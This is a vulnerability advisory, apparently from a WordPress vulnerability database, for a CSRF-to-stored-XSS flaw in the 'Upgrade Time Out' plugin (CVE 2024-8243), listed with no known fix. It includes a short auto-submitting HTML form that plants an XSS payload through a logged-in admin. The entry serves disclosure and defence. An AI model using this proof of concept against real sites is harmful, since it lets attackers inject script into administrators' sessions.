Plugin Upgrade Time Out <= 1.0 – Stored XSS via CSRF | CVE 2024-8243 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.

Proof of Concept

Make an admin open an HTML file containing:

```
<form action="https://example.com/wp-admin/options-general.php?page=upgrade-time-out.php" method="POST">
    <input type="text" name="timeout" value='"><img src=x onerror=alert(1)>'>
</form>
<script>
    document.forms[0].submit();
</script>
```

Affects Plugins

wordpressplugin-upgrade-time-out-plugin

No known fix

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website

https://magos-securitas.com/

Verified

Yes

WPVDB ID

8e1e2d8d-41aa-49bc-95d5-dae75be788d5

Timeline

Publicly Published

2025-03-19 (about 9 months ago)

Added

2025-03-19 (about 9 months ago)

Last Updated

2025-03-19 (about 9 months ago)

Other

Published

Title

Published

2021-04-12

Title

WP Login Security and History <= 1.0 - CSRF to Stored Cross-Site Scripting (XSS)

Published

2023-02-23

Title

Organization chart < 1.4.5 - Multiple CSRF

Published

2021-09-13

Title

Software License Manager < 4.5.1 - Arbitrary Domain Deletion via CSRF

Published

2023-10-16

Title

CPT Shortcode Generator <= 1.0 - Arbitrary Settings Update via CSRF

Published

2025-01-16

Title

Find Your Reps <= 1.2 - Cross-Site Request Forgery to Stored Cross-Site Scripting